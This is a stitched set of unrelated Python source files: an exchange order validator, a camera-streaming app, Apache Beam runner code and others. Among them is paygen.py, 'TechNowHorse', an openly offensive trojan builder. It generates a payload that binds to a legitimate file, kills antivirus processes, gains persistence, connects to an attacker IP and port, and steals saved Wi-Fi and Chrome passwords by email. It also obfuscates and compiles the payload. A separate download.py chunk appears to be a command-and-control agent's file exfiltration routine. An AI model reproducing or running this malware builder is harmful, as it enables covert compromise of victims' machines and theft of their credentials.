raise ValueError("Expected cancel message but was not the same length.")
else:
outbound[4] = cancel_repl_reason
self.connection_manager.send_message(client_id, Util.package(outbound))
if self.debug == "debug":
self.print_dict.set()
def _validate_order_syntax(self, content: dict, client_id: int): # -> (bool, list):
"""
Validates the formatting of the order from a specfic client.
:param content: Decoded and parsed messaged sent by the client.
:param client_id: Unique Integer ID assigned to each client by the receiver.
:returns: boolean of whether the order is allowed or not.
"""
msg_type = content["message_type"]
err_code = None
outbound = []
if msg_type == 'O':
# Checking Error rejected reasons in Table 3 Section 7.7.
# Not Implemented: H, V, i, R, F, L, C, O
if content["orderbook_id"] > 3 or content["orderbook_id"] < 0:
err_code = "S"
elif content["price"] > self.PRICE_MAX:
err_code = "X"
elif content["quantity"] > self.QUANTITY_MAX or content["quantity"] <= 0:
err_code = "Z"
elif content["minimum_quantity"] > 0 and content["time_in_force"] != 0:
err_code = "N"
elif content["buy_sell_indicator"] not in ("B", "S", "T", "E") or \
content["order_classification"] not in ("1", "3", "4", "5", "6") or \
content["time_in_force"] not in (0, 99999):
err_code = "Y"
elif content["display"] not in ("P", " "):
err_code = "D"
elif content["cash_margin_type"] not in ("1", "2", "3", "4", "5"):
err_code = "G"
else:
return True, outbound
outbound = ["J", Util.get_server_time(), content["order_token"], err_code]
return False, outbound
elif msg_type == 'U':
if content["price"] > self.PRICE_MAX:
err_code = "X"
elif content["quantity"] > self.QUANTITY_MAX:
err_code = "Z"
elif content["minimum_quantity"] > 0 and content["time_in_force"] != 0:
err_code = "N"
elif content["time_in_force"] not in (0, 99999):
err_code = "Y"
elif content["display"] not in ("P", " "):
err_code = "D"
else:
return True, outbound
outbound = [err_code]
return False, outbound
elif msg_type == 'X':
return True, outbound
else:
raise ValueError(f"Invalid header detected in Exchange validation.")
def _handle_signal(self):
"""Handler which dumps the orderbook into a csv file when SIGUSR1 or SIGILL is caught in silent mode."""
# implement with sigill in windows and sigusr1 in linux
# use sys.platform to check operating system
pass
def _print_orderbook_thread(self):
"""Threading wrapper for print_orderbook which outputs once every second."""
while True:
time.sleep(1)
if self.debug == "debug":
self._print_orderbook_debug()
elif self.debug == "none":
pass
elif self.debug == "default":
self._print_orderbook()
else:
raise Exception(f"Output mode {self.debug} not defined.")
def _print_orderbook(self):
"""Prints the Orderbook to the console in a nice format."""
if self.debug == "none":
raise Exception("Normal printing when should be debugging")
self.orderbook_lock.acquire()
Console(loadfrom=self.orderbook.get_book()).print()
self.connection_manager.print_connections()
self.orderbook_lock.release()
def _print_orderbook_debug(self):
"""Prints the Orderbook to the console in a nice format."""
if not self.debug == "debug":
raise Exception("Debug printing when not in debugging mode")
self.print_dict.clear()
self.orderbook_lock.acquire()
Console(loadfrom=self.orderbook.get_book()).print()
self.connection_manager.print_connections()
self.orderbook.debug()
self.connection_manager.print_log()
self.orderbook_lock.release()
self.print_dict.wait() |
paygen.py | #!/usr/bin/env python3
import encrypt_code
import os
import argparse
import subprocess
import shutil
import banners
import platform
from essential_generators import DocumentGenerator
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
if platform.system() == 'Windows':
PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
Attacker_System = 'Windows'
elif platform.system() == 'Linux':
Attacker_System = 'Linux'
PYTHON_PYINSTALLER_PATH = "wine ~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe"
def get_options():
parser = argparse.ArgumentParser(description=f'{RED}TechnowHorse v1.6')
parser._optionals.title = f"{GREEN}Optional Arguments{YELLOW}"
parser.add_argument("-w", "--windows", dest="windows", help="Generate a Windows executable.", action='store_true')
parser.add_argument("-l", "--linux", dest="linux", help="Generate a Linux executable.", action='store_true')
parser.add_argument("-t", "--persistence", dest="time_persistent", help="Becoming Persistence After __ seconds. default=10", default=10)
parser.add_argument("-b", "--bind", dest="bind", help="AutoBinder : Specify Path of Legitimate file.")
parser.add_argument("-k", "--kill_av", dest="kill_av", help="AntivirusKiller : Specify AV's .exe which need to be killed. Ex:- --kill_av cmd.exe")
parser.add_argument("-s", "--steal-password", dest="stealer", help=f"Steal Saved Password from Victim Machine [{RED}Supported OS : Windows{YELLOW}]", action='store_true')
required_arguments = parser.add_argument_group(f'{RED}Required Arguments{GREEN}')
required_arguments.add_argument("--icon", dest="icon", help="Specify Icon Path, Icon of Evil File [Note : Must Be .ico].")
required_arguments.add_argument("--ip", dest="ip", help="Email address to send reports to.")
required_arguments.add_argument("--port", dest="port", help="Port of the IP Address given in the --ip argument.")
required_arguments.add_argument("-e", "--email", dest="email", help="Email address to send \'TrojanHorse Started\' Notification with other Juicy Info.")
required_arguments.add_argument("-p", "--password", dest="password", help="Password for the email address given in the -e argument.")
required_arguments.add_argument("-o", "--output", dest="output", help="Output file name.", required=True)
return parser.parse_args()
def get_python_pyinstaller_path():
try:
if os.name in ('ce', 'nt', 'dos'):
# If OS == Windows
python_path = subprocess.check_output("where pyinstaller.exe", shell=True)
elif 'posix' in os.name:
# If OS == Linux
python_path = subprocess.check_output("which pyinstaller.exe", shell=True)
python_path = str(python_path).split('\'')[1]
python_path = python_path.replace("\\n", "")
python_path = python_path.replace("\\r", "")
python_path = python_path.replace("\\\\", "/")
except Exception:
python_path = "UnableToFind"
return python_path
def check_dependencies():
print(f"{YELLOW}\n[*] Checking Dependencies...")
try:
import mss, essential_generators, PyInstaller, six
print(f"{GREEN}[+] All Dependencies are Installed on this system ;)\n")
except Exception as e:
print(f"[!] Error : {e}")
try:
print(f"{YELLOW}[*] Installing All Dependencies From Scratch...\n")
print(f'\n{WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
import pip
while 1:
pip.main(['install', 'mss==4.0.3'])
pip.main(['install', 'essential_generators==0.9.2'])
pip.main(['install', 'PyInstaller'])
pip.main(['install', 'six==1.12.0'])
pip.main(['install', 'python-xlib==0.25'])
print(f'\n{WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
print(f"{GREEN}\n[+] Dependencies installed correctly ;)\n")
break
except:
print(f"{RED}\n[!] Unable to Install Dependencies, Please Try Again :(\n")
quit()
def create_trojan(file_name, email, password, ip, port, time_persistent, legitimate_file=None):
with open(file_name, "w+") as file:
file.write("import payload, win32event, winerror, win32api\n")
if arguments.stealer:
file.write("import password_stealer\n")
if arguments.bind or arguments.stealer:
file.write("import threading\n\n")
if arguments.bind != None:
#Codes to Run, Legitimate File on Front End
file.write("import subprocess, sys\n\n")
file.write("def run_front_file():\n")
file.write(f"\tfile_name = sys._MEIPASS.replace('\\\\', '/') + \"/{legitimate_file}\" \n")
file.write(f"\tsubprocess.call(file_name, shell=True)\n\n")
#Running Front End File on Different Thread
file.write("t1 = threading.Thread(target=run_front_file)\n")
file.write("t1.start()\n\n")
#Below Codes will check for already running instance,
file.write("\nmutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')\n\n")
if arguments.stealer:
#Saved Password Stealer
file.write("def steal():\n")
file.write(f"\tsteal = password_stealer.SendPass(\'{email}\', \'{password}\')\n")
file.write(f"\tsteal.get_wifi_creds()\n")
file.write(f"\tprint(\"[+] Wifi Password Send Successfully!\")\n")
file.write(f"\tsteal.get_chrome_browser_creds()\n")
file.write(f"\tprint(\"[+] Chrome Browser Password Send Successfully!\")\n\n")
file.write("def check_and_start():\n")
file.write("\tif win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:\n")
file.write("\t\tmutex = None\n")
file.write("\t\tprint(\"[+] Disabling TechNowHorse: Already Running\")\n")
file.write("\telse:\n") # if no instance running, going to run TechNowHorse
if arguments.stealer:
file.write(f"\t\tt2 = threading.Thread(target=steal)\n") #Making Stealer Thread
file.write(f"\t\tt2.start()\n\n") #Starting Thread
file.write(f"\t\ttechnowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
if arguments.kill_av != None and arguments.kill_av != "":
file.write(f"\t\ttechnowHorse.kill_av({arguments.kill_av})\n")
else:
file.write("\t\ttechnowHorse.kill_av()\n")
file.write(f"\t\ttechnowHorse.become_persistent({time_persistent})\n")
file.write("\t\ttechnowHorse.start()\n\n")
file.write("check_and_start()\n")
def create_trojan_linux(file_name, email, password, ip, port, time_persistent):
with open(file_name, "w+") as file:
file.write("import payload\n")
file.write(f"technowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
file.write(f"technowHorse.become_persistent({time_persistent})\n")
file.write("technowHorse.start()\n\n")
def obfuscating_payload(file_name):
gen = DocumentGenerator()
text = "#" + gen.sentence()
with open(file_name, "a") as file:
file.write(text)
def compile_for_windows(file_name):
if arguments.bind != None and arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.bind != None:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def compile_for_linux(file_name):
subprocess.call(f"pyinstaller --onefile --noconsole --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def del_junk_file(file_name):
try:
if platform.system() == 'Windows':
build = os.getcwd() + "\\build"
file_name = os.getcwd() + f"\\{file_name}"
pycache = os.getcwd() + "\\__pycache__"
os.remove(file_name)
os.remove(file_name + ".spec")
shutil.rmtree(build)
shutil.rmtree(pycache)
if platform.system() == 'Linux':
file_spec = file_name + ".spec"
os.system(f"rm -r build/ __pycache__/ {file_spec} {file_name}")
except Exception:
pass
def exit_greet():
try:
os.system('cls')
except Exception as e:
os.system('clear')
del_junk_file(arguments.output)
print(GREEN + '''Thank You for using TechNowHorse, Think Great & Touch The Sky! \n''' + END)
quit()
if __name__ == '__main__':
if Attacker_System == 'Windows':
try:
shutil.rmtree(os.getcwd() + "\\dist")
except Exception:
pass
else:
try:
os.system('rm -Rf dist')
except Exception:
pass
try:
print(banners.get_banner())
print(f"\t\t{YELLOW}Author: {GREEN}Pushpender | {YELLOW}GitHub: {GREEN}@Technowlogy-Pushpender\n")
arguments = get_options()
if arguments.icon == None:
arguments.icon = input(f'{RED}[!] Please Specify Icon Path {WHITE}[{GREEN}LEAVE BLANK to SET icon/exe.ico as icon{WHITE}] : ')
if arguments.icon == "":
arguments.icon = "icon/exe.ico"
if not os.path.exists(PYTHON_PYINSTALLER_PATH.replace("wine ", "")) and arguments.windows:
PYTHON_PYINSTALLER_PATH = get_python_pyinstaller_path()
if PYTHON_PYINSTALLER_PATH == "UnableToFind":
print(f'{RED}[!] Default Pyinstaller Path inside Wine Directory is Incorrect')
print(f'{RED}[!] {WHITE}[Please Update Line 19 Later] [{RED}DefautPath: {WHITE}~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe]')
PYTHON_PYINSTALLER_PATH = "wine "
PYTHON_PYINSTALLER_PATH += input(f'\n{WHITE}[?] Enter pyinstaller.exe path manually : ')
print(f'\n{GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]{GREEN}')
print(f'\n {YELLOW}Email:{RED} ' + arguments.email)
print(f' {YELLOW}Password:{RED} ' + arguments.password)
print(f' {YELLOW}IP Address:{RED} ' + arguments.ip)
print(f' {YELLOW}Port:{RED} ' + arguments.port)
print(f' {YELLOW}Output Evil File Name:{RED} ' + arguments.output)
print(f' {YELLOW}Becoming Persistence After:{RED} ' + str(arguments.time_persistent) + f'{YELLOW} seconds')
print(f' {YELLOW}Icon Path:{RED} ' + arguments.icon)
if arguments.bind != None:
print(f' {YELLOW}Binding To [{RED}Legitimate File Path{YELLOW}]:{RED} ' + str(arguments.bind))
print(f'\n{GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
ask = input(f'\n{WHITE}[?] These info above are correct? (y/n) : ')
if ask.lower() == 'y':
pass
else:
arguments.email = input('\n[?] Type your gmail to receive logs: ')
arguments.password = input('[?] Type your gmail password: ')
arguments.ip = input('[?] LHOST or IP Address: ')
arguments.port = int(input('[?] LPORT: '))
arguments.time_persistent = int(input('[?] Time After which it should become persistence; [In Seconds]: '))
arguments.output = input('[?] Output Evil File Name: ')
arguments.icon = input(f'[?] Icon Path [{RED}If Present In This Directory, then just type Name{WHITE}]: ')
if arguments.bind != None:
arguments.bind = input(f'[?] Path of Legitimate File [{RED}.exe is Recommended{WHITE}]: ')
check_dependencies()
print(f"\n{YELLOW}[*] Generating Please wait for a while...{MAGENTA}\n")
if Attacker_System == 'Linux':
if arguments.linux:
create_trojan_linux(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent)
if Attacker_System == 'Windows' and arguments.linux:
print(f"{RED}[!] Linux payload can't be compiled from windows machine")
print(f"{YELLOW}[*] Making Payload for Windows ...\n")
if arguments.windows:
create_trojan(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent, arguments.bind)
obfuscating_payload(arguments.output)
encrypting_code = encrypt_code.Encrypt()
encrypting_code.encrypt(arguments.output)
print(f"{YELLOW}[*] Compiling your payload, Please Wait for a while...")
print(f"{MAGENTA}")
if arguments.windows:
compile_for_windows(arguments.output)
elif arguments.linux:
compile_for_linux(arguments.output)
else:
print(f"{RED}[!] Please Specify {YELLOW}-w{RED} for {GREEN}WINDOWS{RED} or {YELLOW}-l{RED} for {GREEN}LINUX{RED} payload generation")
print(f"\n{YELLOW}[*] Deleting Junk Files...")
del_junk_file(arguments.output)
print(f"{GREEN}[+] Junk Files Removed Successfully!")
if os.path.exists(f'dist/{arguments.output}.exe') or os.path.exists(f'dist/{arguments.output}'):
print(f"\n{GREEN}[+] Generated Successfully!\n")
print(f"\n\n{RED}[***] Don't forget to allow less secure applications in your Gmail account.")
print(f"{GREEN}Use the following link to do so https://myaccount.google.com/lesssecureapps")
print(f"\n{RED} :O-) TIP{YELLOW} : USE ICONS from {RED}icon{YELLOW} folder like this >> {RED}--icon icon/exe.ico")
else:
print(f"\n{RED}[!] Failed To Generate Your Payload :(, Please Try Again!\n")
print(f"\n{GREEN}[:D] Please Contact us on https://github.com/Technowlogy-Pushpender/technowhorse\n")
except KeyboardInterrupt:
exit_greet()
|
26'sPick Up.py | import sys
from g_python.gextension import Extension
from g_python.hmessage import Direction
from time import sleep
import threading
extension_info = {
"title": "26's Pick Up",
"description": "dl: set&off&stack&pick ",
"version": "0.1.1",
"author": "funkydemir66"
}
ext = Extension(extension_info, sys.argv, silent=True)
ext.start()
KATMER = "MoveObject"
KASAR = "PassCarryItem"
HIYAR = "SetCustomStackingHeight"
kod = ""
kod2 = ""
sec_kod = sc = False
def konusma(msj):
global sc, sec_kod, sec_player
def main():
while sc:
for i in range(256):
if sc:
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod2)+'}{i:1}{i:11}{i:0}')
sleep(0.3)
text = msj.packet.read_string()
if text == ':dl stack':
msj.is_blocked = True
sec_kod = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Select and move the furniture you want to stack, then type :dl set"}{i:0}{i:30}{i:0}{i:0}')
if text == ':dl pick':
msj.is_blocked = True
sec_player = True
ext.send_to_client('{in:Chat}{i:123456789}{s:""double click on the furniture you want to remove}{i:0}{i:30}{i:0}{i:0}')
if text == ':dl set':
msj.is_blocked = True
sc = True
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod)+'}{i:1}{i:11}{i:0}')
ext.send_to_server('{out:SetCustomStackingHeight}{i:'+str(kod)+'}{i:3500}')
ext.send_to_client('{in:Chat}{i:123456789}{s:"Stack setting "}{i:0}{i:30}{i:0}{i:0}')
thread = threading.Thread(target=main)
thread.start()
if text == ':dl off':
msj.is_blocked = True
sc = False
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: off "}{i:0}{i:30}{i:0}{i:0}')
sec_player = False
def yukle_kod(p):
global kod, sec_kod
if sec_kod:
mobi_id, _, _, _, _ = p.packet.read("iiiii")
kod = str(mobi_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
sec_kod = False
def yukle_kod2(p):
global kod2, sec_player
if sec_player:
player_id, _, _ = p.packet.read("iii")
kod2 = str(player_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"Pick up '+str(kod2)+' "}{i:0}{i:30}{i:0}{i:0}')
ext.intercept(Direction.TO_SERVER, konusma, 'Chat')
ext.intercept(Direction.TO_SERVER, yukle_kod, 'MoveObject')
ext.intercept(Direction.TO_SERVER, yukle_kod2, 'UseFurniture') |
fake_learner.py | # -*- coding: utf-8 -*-
"""
File name : learner
Date : 14/05/2019
Description : {TODO}
Author : VickeeX
"""
from zmq_serialize import SerializingContext
import multiprocessing as mp, zmq
class FakeLearner:
def __init__(self):
self.shared = []
self.queue = mp.Queue(maxsize=10240)
def zmq_server_run(self):
ctx = SerializingContext()
rep = ctx.socket(zmq.REP)
rep.bind("tcp://127.0.0.1:6666")
# while True:
for i in range(6):
data = rep.recv_zipped_pickle()
self.put_batch(data)
print("Checking zipped pickle...")
# print("Okay" if (shared_rewards[2] == B[2][3]).all() else "Failed")
rep.send_string("received data.")
print("ok.")
def put_batch(self, data):
self.queue.put(data)
print("put ok")
# print(self.queue.qsize())
def get_batch(self):
return self.queue.get()
def train(self):
""" train"""
mp.Process(target=self.zmq_server_run).start()
for i in range(6):
dt = self.get_batch()
print(dt.__sizeof__())
print("get batch", i, "ok")
# print(len(data), data[0][1].shape, data[0][2].shape, data[0][3].shape)
# print("ok" if data[0][3] == np.ones(shape=(32,), dtype=np.float32) else "data wrong")
|
streaming.py | import sys
import os
from time import sleep
import grpc
import camera_pb2
import camera_pb2_grpc
import threading
import logging
from concurrent import futures
import queue
import traceback
from flask import Flask, render_template, Response
from kubernetes import client, config
import re
camera_frame_queues = []
small_frame_sources = []
def get_camera_list(configuration_name):
camera_list = []
config.load_incluster_config()
coreV1Api = client.CoreV1Api()
ret = coreV1Api.list_service_for_all_namespaces(watch=False)
    p = re.compile(configuration_name + r"-[\da-f]{6}-svc")
for svc in ret.items:
if not p.match(svc.metadata.name):
continue
grpc_ports = list(filter(lambda port: port.name == "grpc", svc.spec.ports))
if (len(grpc_ports) == 1):
url = "{0}:{1}".format(svc.spec.cluster_ip, grpc_ports[0].port)
camera_list.append(url)
camera_list.sort()
return camera_list
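# Example (hypothetical names): with CONFIGURATION_NAME="akri-udev-video", a
# service named "akri-udev-video-8120fe-svc" matches the pattern above and is
# returned as its "cluster-ip:port" string, e.g. "10.0.0.12:80".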
app = Flask(__name__)
@app.route('/')
# Home page for video streaming.
def index():
global camera_frame_queues
return render_template('index.html', camera_count=len(camera_frame_queues)-1)
@app.route('/camera_list')
# Returns the current list of cameras to allow for refresh
def camera_list():
global small_frame_sources
return ",".join(small_frame_sources)
# Generator function for video streaming.
def gen(frame_queue, verbose=False):
while True:
frame = frame_queue.get(True, None)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
# Gets response and puts it in frame queue.
def response_wrapper(frame_queue):
return Response(gen(frame_queue),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/camera_frame_feed/<camera_id>')
# Gets frame feed for specified camera.
def camera_frame_feed(camera_id=0):
global camera_frame_queues
camera_id = int(camera_id)
    if (camera_id < len(camera_frame_queues)):
logging.info("camera_feed %d" % camera_id)
return response_wrapper(camera_frame_queues[camera_id])
return None
# Updates set of cameras based on set of camera instance services
def refresh_cameras(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event):
while True:
sleep(1)
camera_list = get_camera_list(os.environ['CONFIGURATION_NAME'])
if camera_list != small_frame_sources:
old_count = len(small_frame_sources)
new_count = len(camera_list)
logging.info("Camera change detected, old: %d, new: %d" % (old_count, new_count))
if old_count != new_count:
if old_count < new_count:
for x in range(new_count - old_count):
camera_frame_queues.append(queue.Queue(1))
small_frame_sources[:] = camera_list
else:
small_frame_sources[:] = camera_list
camera_frame_queues[:] = camera_frame_queues[:(old_count - new_count)]
else:
small_frame_sources[:] = camera_list
logging.info(small_frame_sources)
schedule_get_frames(
camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event)
def run_webserver():
app.run(host='0.0.0.0', threaded=True)
# Loops, creating gRPC client and grabing frame from camera serving specified url.
def get_frames(url, frame_queue, stop_event):
logging.info("Starting get_frames(%s)" % url)
while not stop_event.wait(0.01):
try:
client_channel = grpc.insecure_channel(url, options=(
('grpc.use_local_subchannel_pool', 1),))
camera_stub = camera_pb2_grpc.CameraStub(client_channel)
frame = camera_stub.GetFrame(camera_pb2.NotifyRequest())
frame = frame.frame
client_channel.close()
frame_received = False
# prevent stale data
if (len(frame) > 0):
if (frame_queue.full()):
try:
frame_queue.get(False)
                    except queue.Empty:
                        pass
frame_queue.put(frame, False)
frame_received = True
if (frame_received):
sleep(1)
        except Exception:
logging.info("[%s] Exception %s" % (url, traceback.format_exc()))
sleep(1)
# schedules frame polling threads
def schedule_get_frames(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event):
if camera_frame_threads:
stop_event.set()
for camera_frame_thread in camera_frame_threads:
camera_frame_thread.join()
stop_event.clear()
camera_frame_threads.clear()
cameras_frame_thread = threading.Thread(target=get_frames, args=(main_frame_source, camera_frame_queues[0], stop_event))
cameras_frame_thread.start()
camera_frame_threads.append(cameras_frame_thread)
for camera_id in range(1, len(small_frame_sources) + 1):
camera_frame_thread = threading.Thread(target=get_frames, args=(small_frame_sources[camera_id - 1], camera_frame_queues[camera_id], stop_event))
camera_frame_thread.start()
camera_frame_threads.append(camera_frame_thread)
print("Starting...", flush=True)
logging.basicConfig(format="%(asctime)s: %(message)s", level=logging.INFO, datefmt="%H:%M:%S")
main_frame_source = ""
if 'CONFIGURATION_NAME' in os.environ:
# Expecting source service ports to be named grpc
configuration_name = os.environ['CONFIGURATION_NAME']
config.load_incluster_config()
coreV1Api = client.CoreV1Api()
ret = coreV1Api.list_service_for_all_namespaces(watch=False)
for svc in ret.items:
if svc.metadata.name == configuration_name + "-svc":
grpc_ports = list(
filter(lambda port: port.name == "grpc", svc.spec.ports))
if (len(grpc_ports) == 1):
main_frame_source = "{0}:{1}".format(
svc.spec.cluster_ip, grpc_ports[0].port)
small_frame_sources = get_camera_list(configuration_name)
camera_count = len(small_frame_sources)
else:
camera_count = int(os.environ['CAMERA_COUNT'])
main_frame_source = "{0}:80".format(os.environ['CAMERAS_SOURCE_SVC'])
for camera_id in range(1, camera_count + 1):
url = "{0}:80".format(
os.environ['CAMERA{0}_SOURCE_SVC'.format(camera_id)])
small_frame_sources.append(url)
for camera_id in range(camera_count + 1):
camera_frame_queues.append(queue.Queue(1))
webserver_thread = threading.Thread(target=run_webserver)
webserver_thread.start()
stop_event = threading.Event()
camera_frame_threads = []
schedule_get_frames(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event)
if 'CONFIGURATION_NAME' in os.environ:
refresh_thread = threading.Thread(target=refresh_cameras, args=(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event))
refresh_thread.start()
print("Started", flush=True)
webserver_thread.join()
print("Done", flush=True)
|
download.py | def download(task_id, path):
global responses
path = path.replace("\\", "/")
# print("Downloading " + path)
# chunkSize = 512000
chunkSize = 10000
fileSize = os.path.getsize(path)
chunks = math.ceil(fileSize / chunkSize)
fullpath = os.path.abspath(path)
# print("FILESIZE = " + str(fileSize))
# print(str(chunks) + " chunks needed")
response = {
"total_chunks": chunks,
"task_id": task_id,
"full_path": fullpath,
"host": "",
"is_screenshot": "false"
}
responses.append(response)
def download_thread():
i = 1
file_id = ""
        while i <= chunks:
if result:
for item in result['responses']:
if item['task_id'] == task_id and item['status'] == "success":
# print("HO TROVATO IL LA RIPOSTA SUCCESS PER QUESTO TASK")
if file_id == "":
file_id = item['file_id']
result['responses'].remove(item)
                        # Binary mode keeps chunk offsets byte-accurate for
                        # arbitrary files (assumes the to64() helper base64-encodes bytes).
                        f = open(fullpath, 'rb')
                        f.seek((i - 1) * chunkSize)
                        blob = f.read(chunkSize)
                        chunk_data = to64(blob)
if i == chunks:
print("i == chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id,
"completed": True
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
                            f.close()
                            i += 1
                            print("\t- Download Done")
                            # return ends only this worker thread (exit() would
                            # raise SystemExit inside the thread to the same effect).
                            return
else:
print("i != chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i += 1
if item['task_id'] == task_id and item['status'] != "success":
print("ERROR SENDING FILE")
break
d = threading.Thread(target=download_thread, args=())
d.start() |
portable_runner.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
retrieval_token = self.stage(
proto_pipeline,
prepare_response.artifact_staging_endpoint.url,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id, retrieval_token)
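  # Usage sketch (the job_service stub and proto_pipeline are assumed to come
  # from create_job_service() / get_proto_pipeline() further below):
  #   handle = JobServiceHandle(job_service, options)
  #   job_id, message_stream, state_stream = handle.submit(proto_pipeline)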
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
